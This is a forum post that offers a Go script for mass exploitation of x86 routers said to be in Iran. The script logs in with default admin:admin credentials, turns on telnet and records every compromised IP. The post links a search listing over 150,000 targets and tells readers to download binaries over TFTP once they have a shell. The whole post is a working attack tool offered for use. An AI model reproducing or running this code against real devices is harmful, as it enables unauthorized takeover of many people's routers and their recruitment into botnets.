Exploit x86-based router from Iran

[ltx_Lazzarus]

Just using some fair dinkum techniques to open up that telnet shell on the devices

150k+ Iranian Router Devices: https://en.fofa.info/result?qbase64=InJ ... lSIg%3D%3D

Ports: 443 and 80 - that's where the action's at! We'll be slingin' all those hits straight into the file, with the ol' IP: 23 and admin:admin combo.

Time to get the TFTP goin' and download those bins, mate. The arch is good ol' x86.

When you're in the telnet shell, just give it a "shell" and you're in business. Grab that 1.1.1.1 file with the TFTP get.

Code: Select all

package main

import (
    "bufio"
    "fmt"
    "io/ioutil"
    "net/http"
    "os"
    "sync"
)

const (
    loginURL      = "http://%s/login.cgi"
    telnetURL     = "http://%s/form2Telnet.cgi"
    loginPayload  = "usernameEncrypt=21232f297a57a5a743894a0e4a801fc3&passwordEncrypt=21232f297a57a5a743894a0e4a801fc3&submit.htm%%3Flogin.htm=Send"
    telnetPayload = "telnet=1&submit.htm%%3Ftelnet_onoff.htm=Send"
    outputFile    = "successful_hits.txt"
    failedContent = "<html><head><meta HTTP-EQUIV=\"Pragma\" CONTENT=\"no-cache\"><script language='javascript'>parent.location=\"/login.htm\"</script></head><body></body></html>"
)

var (
    successful int
    failed     int
    mu         sync.Mutex
)

func enableTelnet(ip string, file *os.File) {
    // Login
    resp, err := http.PostForm(fmt.Sprintf(loginURL, ip), map[string][]string{
        "usernameEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
        "passwordEncrypt": {"21232f297a57a5a743894a0e4a801fc3"},
        "submit.htm?login.htm": {"Send"},
    })
    if err != nil {
        mu.Lock()
        failed++
        mu.Unlock()
        return
    }
    defer resp.Body.Close()

    // Enable Telnet
    resp, err = http.PostForm(fmt.Sprintf(telnetURL, ip), map[string][]string{
        "telnet":              {"1"},
        "submit.htm?telnet_onoff.htm": {"Send"},
    })
    if err != nil {
        mu.Lock()
        failed++
        mu.Unlock()
        return
    }
    defer resp.Body.Close()

    bodyBytes, _ := ioutil.ReadAll(resp.Body)
    bodyString := string(bodyBytes)

    if resp.StatusCode == http.StatusOK && bodyString == failedContent {
        mu.Lock()
        failed++
        mu.Unlock()
    } else {
        mu.Lock()
        successful++
        fmt.Fprintf(file, "%s:23 admin:admin\n", ip)
        mu.Unlock()
    }
}

func main() {
    if len(os.Args) < 3 {
        fmt.Println("Made by Vars_Secc, Usage: ./golangscript ips.txt threads")
        return
    }

    filePath := os.Args[1]
    threads := os.Args[2]

    ipFile, err := os.Open(filePath)
    if err != nil {
        fmt.Println("Error opening IP file:", err)
        return
    }
    defer ipFile.Close()

    outFile, err := os.Create(outputFile)
    if err != nil {
        fmt.Println("Error creating output file:", err)
        return
    }
    defer outFile.Close()

    var wg sync.WaitGroup
    sem := make(chan bool, threads)

    scanner := bufio.NewScanner(ipFile)
    for scanner.Scan() {
        wg.Add(1)
        sem <- true
        go func(ip string) {
            defer wg.Done()
            enableTelnet(ip, outFile)
            <-sem
        }(scanner.Text())
    }

    wg.Wait()

    fmt.Printf("Made by Vars_Secc, Successful: %d\n", successful)
    fmt.Printf("Made by Vars_Secc, Failed: %d\n", failed)
}